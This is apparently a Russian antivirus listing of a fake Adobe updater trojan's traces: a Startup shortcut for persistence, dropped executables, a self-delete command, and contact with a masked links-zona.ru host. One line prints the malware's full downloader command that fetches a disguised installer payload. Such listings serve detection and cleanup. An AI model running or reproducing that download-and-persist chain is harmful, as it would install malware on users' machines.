Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\adobe-updater.lnk
- '%PROGRAM_FILES%\AutoFree Weather\autofree-weather.exe'
- '%TEMP%\deleter.exe' /sfx=<Полный путь к вирусу>
- '%PROGRAM_FILES%\Adobe\~ptzjfbypkrk.exe'
- '%PROGRAM_FILES%\Adobe\adobe-updater.exe'
- '%PROGRAM_FILES%\Adobe\downloader.exe' -cN --waitretry=3 -t3 -T10 --output-document="%PROGRAM_FILES%\Adobe\~ptzjfbypkrk.exe" "http://fo####.links-zona.ru/NDc2MztodHRwJTNBJTJGJTJGYWloZG93bmxvYWQuYWRvYmUuY29tJTJGYmluJTJGbGl2ZSUyRmluc3RhbGxfZmxhc2hwbGF5ZXIxMXgzMl9tc3NhX2FhYV9haWguZXhlO25hbWU9aW5zdGFsbF9mbGFzaHBsYXllcjExeDMyX21zc2FfYWFhX2FpaC5leGU7c2l6ZT0xNTcyODY0O3R5cGU9c2V0dXA="
- '%PROGRAM_FILES%\Adobe\~ptzjfbypkrk.exe' (загружен из сети Интернет)
- %PROGRAM_FILES%\Adobe\~ptzjfbypkrk.exe
- %PROGRAM_FILES%\AutoFree Weather\autofree-weather.exe
- %TEMP%\deleter.exe
- %TEMP%\nsk2.tmp\System.dll
- %PROGRAM_FILES%\Adobe\adobe-updater.exe
- %PROGRAM_FILES%\Adobe\downloader.exe
- %TEMP%\nsk2.tmp\System.dll
- 'fo####.links-zona.ru':80
- fo####.links-zona.ru/NDc2MztodHRwJTNBJTJGJTJGYWloZG93bmxvYWQuYWRvYmUuY29tJTJGYmluJTJGbGl2ZSUyRmluc3RhbGxfZmxhc2hwbGF5ZXIxMXgzMl9tc3NhX2FhYV9haWguZXhlO25hbWU9aW5zdGFsbF9mbGFzaHBsYXllcjExeDMyX21zc2FfYWFhX2FpaC5leGU7c2l6ZT0xNTcyODY0O3R5cGU9c2V0dXA=
- DNS ASK fo####.links-zona.ru
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'